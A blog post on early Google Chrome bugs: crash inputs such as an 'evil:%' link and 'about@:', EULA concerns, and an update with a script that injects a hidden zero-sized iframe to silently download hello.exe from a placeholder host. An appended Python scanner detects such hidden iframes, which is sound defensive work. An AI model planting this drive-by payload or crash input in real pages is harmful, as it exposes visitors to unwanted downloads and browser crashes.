Update: 10.09.08: As of today, due to a Chrome update, the :% issue is no longer valid.

Rishi Narang was the first. A denial of service, simple as pie:
Just browse this page and place your mouse over this link (make sure you bookmark this page if you want to read on though):
Just “evil:%” in the anchor text is capable of crashing all the Chrome tabs (even though all the tabs are separate processes).
Someone has also reported that entering a very long bookmark may kill the browser. The length has not been given but it’s worth a try.
If your Chrome is still alive you may want to try entering
about@:
in the location bar.
The good thing is that the browser doesn’t need Administrator rights to run.
Matt Cutts has stated on his blog that chapter 11 of the EULA will be updated. Yes, the chapter about you giving all the rights to Google:
a perpetual, irrevocable, worldwide, royalty-free, and non-exclusive license to reproduce, adapt, modify, translate, publish, publicly perform, publicly display and distribute any Content which you submit, post or display on or through, the Services.
I’m worried about the enthusiastic reviews I see online.
The Google brand was enough to push an unfinished product to 1% of the User-Agents in use on its very first day.
The risk is high, fuzzers are still crunching…
Update:
Another Bug found.
<script>document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');</script>
This script should (I haven’t tested it yet, will do it later) trigger a silent download on the client machine.
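For anyone reviewing pages for this pattern, here is an added example (not code from the original post) that flags zero-sized iframes pointing at executables. Because the iframe above is written by `document.write`, a scanner that only looks at real tags misses it, so the script text is parsed again. The extension list, function names and sample page are assumptions made for the illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed list of extensions treated as executable downloads (not from the post).
EXECUTABLE_EXTS = (".exe", ".scr", ".msi", ".bat", ".com")


class HiddenIframeFinder(HTMLParser):
    """Collects the src of iframes that are zero-sized and point at an executable."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
        elif tag == "iframe":
            a = {k: (v or "") for k, v in attrs}
            hidden = a.get("width", "").strip() == "0" or a.get("height", "").strip() == "0"
            path = urlparse(a.get("src", "")).path.lower()
            if hidden and path.endswith(EXECUTABLE_EXTS):
                self.findings.append(a["src"])

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Markup injected with document.write() is plain text inside <script>,
        # so parse that text again to see the tags it would create.
        if self._in_script and "<iframe" in data.lower():
            inner = HiddenIframeFinder()
            inner.feed(data.replace('\\"', '"'))  # undo JS-escaped quotes
            inner.close()
            self.findings.extend(inner.findings)


def find_hidden_exe_iframes(html):
    finder = HiddenIframeFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed sample page: the snippet from the post plus a harmless visible iframe.
SAMPLE = """<html><body><p>hello</p>
<script>document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');</script>
<iframe src="http://www.example.com/video.html" width="400" height="300"></iframe>
</body></html>"""

if __name__ == "__main__":
    print(find_hidden_exe_iframes(SAMPLE))
```

This only covers iframes hidden through width/height attributes and markup written as a literal string; iframes hidden with CSS or assembled at runtime need a rendering-based check.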


